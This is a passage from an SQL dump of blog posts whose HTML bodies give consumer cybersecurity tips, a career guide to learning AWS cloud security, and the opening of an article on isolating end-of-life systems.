cards are an excellent way to protect your financial information when shopping online. They generate a unique card number for each transaction, which hides your real card details from merchants.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Even if a hacker breaches a merchant’s database, your real credit card information remains safe. 
Virtual cards also allow you to set limits, making it harder for unauthorized charges to occur.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use services like Privacy.com or your bank\'s virtual card feature.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Replace your physical card details with a virtual card for online purchases.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Use Tap-to-Pay Instead of Physical Cards</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you’re still swiping or inserting your credit card at payment terminals, it’s time to switch to tap-to-pay technology. Services like Apple Pay or Google Pay tokenize your card details, creating a secure layer between you and the merchant.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tap-to-pay ensures that your actual credit card number is never shared with merchants. 
Instead, a temporary token is used for the transaction, protecting your data from being stolen.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Add your credit card to the wallet app on your smartphone or smartwatch.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use the tap-to-pay feature at stores, cafés, or kiosks whenever possible.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Generate Unique Username Emails for Logins</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Most people re-use their email address across multiple accounts. But what if you could create a unique email for each login? 
This simple trick adds a layer of protection to your accounts.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When combined with strong passwords, having unique emails for different accounts makes it almost impossible for hackers to access all your logins, even in the event of a data breach.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use email tools like Apple’s \"Hide My Email\" feature, ProtonMail’s SimpleLogin, or append unique identifiers with Gmail by adding \"+[identifier]\" to your address (e.g., myemail+netflix@gmail.com).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Apply this practice to new accounts you create going forward.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. 
Set Up a Credit Freeze</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A credit freeze prevents lenders from accessing your credit history, making it much harder for identity thieves to open new accounts in your name.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Even if a hacker has your Social Security number or other details, a credit freeze blocks them from using your information to apply for loans or credit cards.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Contact major credit bureaus like Experian, TransUnion, and Equifax.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Request a freeze on your credit, which you can easily lift temporarily if you need to apply for credit yourself.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Remove Your Personal Data from Data Brokers</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Data brokers collect and sell personal information such as your address, phone number, and email. 
This information is often used by scammers or hackers attempting to trick you into revealing sensitive details.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Eliminating your data from these platforms reduces the chances of being targeted. While this can be time-intensive, you also have the option of using services that do it for you, like DeleteMe.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Identify which data brokers hold your information. Common ones include Whitepages, Spokeo, and MyLife.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Follow each site’s opt-out request process, or use a third-party service to remove your details automatically.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Prioritize Physical Device Security</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">You may have robust online protections, but what about your physical devices? 
Protecting your smartphone, tablet, laptop, or any device you use is essential to ensure they remain secure.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Lost or stolen devices are an entry point for hackers. Thankfully, basic precautions like device encryption and screen locks make it nearly impossible for bad actors to retrieve data.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Turn on encryption for your devices (this is usually enabled by default on modern smartphones).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use strong passwords, PINs, or biometric authentication (like fingerprint or face recognition) for device access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Enable \"Find My Device\" features for remote locking or wiping in case of theft.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Proactive Cybersecurity Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Online security is no longer optional—it’s essential. 
Following these lesser-known tips can greatly enhance your digital safety, reduce hackers’ chances of accessing your personal data, and help you stay one step ahead.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Want to make sure all your personal information is truly protected? Services like DeleteMe can save you hours of effort by removing your data from data brokers. They’ve made cybersecurity a simple, stress-free process.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By adopting these tips, you can enjoy peace of mind while navigating an increasingly connected world. Remember, cybersecurity isn’t just about avoiding attack; it’s about building proactive habits that ensure your safety every day.</p>', '', NULL, NULL, 1, 'draft', '2025-01-31 00:59:59', '2026-01-12 21:41:44', 'Information Security', '7 Cybersecurity Tips Easy to Do', '', NULL),
(53, 'The Fastest Way to Learn Cloud Security', 'the-fastest-way-to-learn-cloud-security', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The demand for cloud security professionals has never been greater. With the cloud computing market projected to hit a staggering $1.6 trillion by 2030, the opportunities in cloud security are growing exponentially. A recent survey shows that 35% of organizations highlight cloud security as their biggest talent gap, while nearly 40% of IT professionals identify it as their most critical skills shortage. This dynamic presents an unprecedented opportunity for those looking to break into the field.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But how do you learn cloud security quickly and effectively to land a job? Certifications and watching YouTube tutorials alone won\'t cut it. The rules for succeeding in this domain in 2025 have evolved. Here’s a detailed, SEO-friendly guide inspired by proven strategies to help you kickstart your career in cloud security.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Build a Strong Cloud Foundation</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before you can secure the cloud, you need to understand how it works. A solid foundation in cloud computing is your starting point to mastering cloud security.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why AWS?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Focus on mastering AWS (Amazon Web Services). AWS is the leading cloud provider in the market and offers the most opportunities for cloud professionals. 
Additionally, the knowledge you gain with AWS is transferable to other platforms like Microsoft Azure and Google Cloud Platform (GCP).</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Concepts to Cover</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Shared Responsibility Model</strong></b>: Understand how cloud providers handle physical and infrastructure security while you manage data, permissions, and applications.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Virtualization</strong></b>: Learn how virtualization enables cloud providers to split physical servers into multiple virtual machines, ensuring efficiency and security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Basic Cloud Architecture</strong></b>: Familiarize yourself with storage, networking, operating systems, and how cloud environments are structured.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Certification Boost</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For beginners, obtaining the <b><strong class=\"font-bold\">AWS Certified Cloud Practitioner</strong></b> certification is a great starting point. 
It provides a foundational understanding of AWS and builds your confidence without requiring in-depth technical knowledge.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Pro-Tip</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Adopt a curious mindset. Question everything to grasp why specific technologies are used. For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Why are <b><strong class=\"font-bold\">Virtual Private Clouds (VPCs)</strong></b> necessary, and what problems do they solve?</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">How do security groups differ from network access control lists (NACLs)?</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding the \"why\" provides clarity and helps you make better decisions as a cloud security professional.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Learn Cloud Security Principles and Fundamentals</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once you have a foundation in cloud computing, it’s time to layer in security principles. 
Here are the critical concepts to focus on:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The CIA Triad</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Start with the basics of <b><strong class=\"font-bold\">confidentiality, integrity, and availability (CIA)</strong></b>—the three core pillars of information security. These principles form the foundation for everything in cloud security.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Identity and Access Management (IAM)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Mastering IAM is essential as it plays a significant role in controlling access to cloud resources. Learn how to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Create roles and permissions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Implement policies to ensure the principle of least privilege (granting only the necessary permissions).</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Encryption Fundamentals</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understand symmetric and asymmetric encryption, key management, and how encryption secures data in transit and at rest.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] 
[&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Security Tools and Technologies</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Familiarize yourself with security groups, VPCs, and NACLs, which control traffic and secure your infrastructure. These tools, combined with active threat monitoring services like <b><strong class=\"font-bold\">AWS GuardDuty</strong></b>, allow you to build robust security systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Recommended Certification</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The <b><strong class=\"font-bold\">CompTIA Security+</strong></b> certification is excellent for solidifying your knowledge and following a structured learning path. While certifications alone won’t guarantee a job, they signal to employers that you’ve mastered the fundamentals.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Apply Your Knowledge by Building Real Projects</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Theory and certifications can only take you so far. Practical experience is key to demonstrating your ability to solve real-world problems. Here’s how to get started:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Build Security-Focused Cloud Projects</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One simple yet impactful project you can undertake is securing a static website hosted on <b><strong class=\"font-bold\">Amazon S3</strong></b>. 
This will help you understand key cloud security principles, such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Bucket Policies</strong></b>: Configuring policies to prevent unauthorized modifications while maintaining public access to website content.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">IAM Roles</strong></b>: Creating roles with minimal permissions to optimize security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Infrastructure as Code (IaC)</strong></b>: Use <b><strong class=\"font-bold\">Python</strong></b>, <b><strong class=\"font-bold\">Terraform</strong></b>, or <b><strong class=\"font-bold\">TypeScript</strong></b> to automate setting up secure infrastructure. Automation prevents errors commonly caused by manual deployment and ensures consistency.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Implement Threat Detection</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Integrate monitoring tools like <b><strong class=\"font-bold\">AWS GuardDuty</strong></b> to detect anomalous activities and respond to potential threats. 
Learn how to set up alerts and create workflows to mitigate risks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Version Control and Documentation</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use <b><strong class=\"font-bold\">GitHub</strong></b> for version control and detailed documentation of infrastructure changes. This not only keeps your work organized but also prepares you for real-world DevSecOps practices.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Showcase Your Work</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Document your projects in an online portfolio. Recruiters and hiring managers are often more impressed by practical, demonstrable skills than certifications alone.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Practical Experience Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The best companies are looking for problem-solvers, not just certification holders. When you\'re able to build and secure real solutions, you prove your ability to operate in a professional environment. 
Employers value hands-on experience that showcases your critical thinking and technical expertise.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Additional Resources and Advice</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Stay Updated with Industry Trends</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cloud security is a rapidly evolving field. Follow blogs, join forums, and subscribe to newsletters to stay current with best practices.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Leverage Communities</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Join online communities like LinkedIn groups, Reddit forums, and Discord channels for cloud security professionals. 
Networking can often open doors to learning resources and job opportunities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Consider Advanced Certifications</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once you’ve gained some experience, prestigious certifications like <b><strong class=\"font-bold\">AWS Certified Security – Specialty</strong></b> or <b><strong class=\"font-bold\">Certified Cloud Security Professional (CCSP)</strong></b> can distinguish you as a highly qualified professional.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Future of Cloud Security Jobs in 2025</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With average cloud security salaries around $133,000 and total compensation packages exceeding $160,000, the potential for growth in this field is immense. By following this guide and committing to continuous learning, you position yourself to thrive in one of the fastest-growing areas of tech.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Be proactive, stay curious, and keep building. And most importantly, don’t just learn <i><em class=\"italic\">what</em></i> to do—understand <i><em class=\"italic\">why</em></i> you’re doing it. That’s the mindset that top cloud security engineers adopt to solve the toughest challenges.</p>', '', NULL, NULL, 1, 'draft', '2025-01-28 00:49:36', '2026-01-12 21:41:44', 'Information Security', 'The Fastest Way to Learn Cloud Security', '', NULL),
(54, 'Why Isolating End-of-Life (EOL) Systems is Critical for Cybersecurity', 'why-isolating-end-of-life-eol-systems-is-critical-for-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">In an ideal world, businesses would always operate on up-to-date, secure, and supported software. The reality, however, is that many organizations continue to rely on End-of-Life (EOL) systems or applications, even when they pose significant risks to cybersecurity and operational efficiency. But why are these legacy systems still in use, and how can organizations safeguard their networks if they\'re dependent on such outdated technology?</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This article uncovers the reasons EOL systems persist in organizational environments, explores the risks they pose, and provides actionable solutions to securely leverage legacy systems while protecting your organization\'s network.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What are EOL Systems and Why Do We Rely on Them?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">End-of-Life (EOL) systems</strong></b> are software or hardware products that manufacturers no longer actively support. 
This means they no longer receive updates, including critical security patches that protect against new vulnerabilities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Despite their risks, EOL systems remain in use for several reasons:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Operational Dependencies</strong></b>: Mission-critical applications may run exclusively on legacy systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Cost of Upgrades</strong></b>: Replacing or modernizing software or hardware can be prohibitively expensive.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Compatibility Issues</strong></b>: Newer platforms may not support older applications.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Industry-Specific Needs</strong></b>: Some industries rely on niche software with no modern equivalent.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unfortunately, while these systems may seem essential to business operations, their vulnerabilities make them a significant liability in today\'s cyber threat landscape.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] 